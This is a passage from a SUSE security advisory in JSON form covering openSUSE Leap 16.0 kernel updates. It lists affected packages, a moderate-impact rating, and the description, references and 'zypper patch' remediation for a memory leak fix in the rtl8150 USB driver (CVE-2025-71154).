"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "moderate"
}
],
"title": "CVE-2025-71149"
},
{
"cve": "CVE-2025-71154",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71154"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: usb: rtl8150: fix memory leak on usb_submit_urb() failure\n\nIn async_set_registers(), when usb_submit_urb() fails, the allocated\n async_req structure and URB are not freed, causing a memory leak.\n\n The completion callback async_set_reg_cb() is responsible for freeing\n these allocations, but it is only called after the URB is successfully\n submitted and completes (successfully or with error). If submission\n fails, the callback never runs and the memory is leaked.\n\n Fix this by freeing both the URB and the request structure in the error\n path when usb_submit_urb() fails.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71154",
"url": "https://www.suse.com/security/cve/CVE-2025-71154"
},
{
"category": "external",
"summary": "SUSE Bug 1257163 for CVE-2025-71154",
"url": "https://bugzilla.suse.com/1257163"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
